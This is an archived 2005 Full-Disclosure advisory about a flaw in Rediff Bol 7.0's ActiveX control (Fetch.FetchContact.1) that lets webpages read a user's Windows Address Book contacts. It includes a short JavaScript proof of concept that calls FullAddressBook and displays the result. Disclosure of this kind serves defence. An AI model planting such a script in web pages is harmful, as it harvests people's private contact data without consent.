|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-disclosure] Rediff Bol 7.0 WAB Contacts
From: Gregory R. Panakkal (viper31337
yahoo.co.in)
Date: Sun Sep 04 2005 - 02:57:39 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Rediff Bol 7.0 WAB Contacts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Affected Program : Rediff Bol 7.0
It is a popular instant messenger from Rediff.com
Related URL : http://messenger.rediff.com/newbol/
Discovered by : Gregory R. Panakkal
Vulnerability Description :
Rediff Bol's ActiveX control (Fetch.FetchContact.1 /
Fetch.dll) allows a webpage
to read the user's Windows Address Book (WAB)
contacts. The method "FullAddressBook"
returns the WAB contact list in XML format
Proof Of Concept:
[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]
Online Demo:
http://www.infogreg.com/security/im/rediff-bol-7-exposes-wab.html
rgds,
Gregory R. Panakkal
http://www.infogreg.com/
__________________________________________________________
Yahoo! India Matrimony: Find your partner online. Go to http://yahoo.shaadi.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]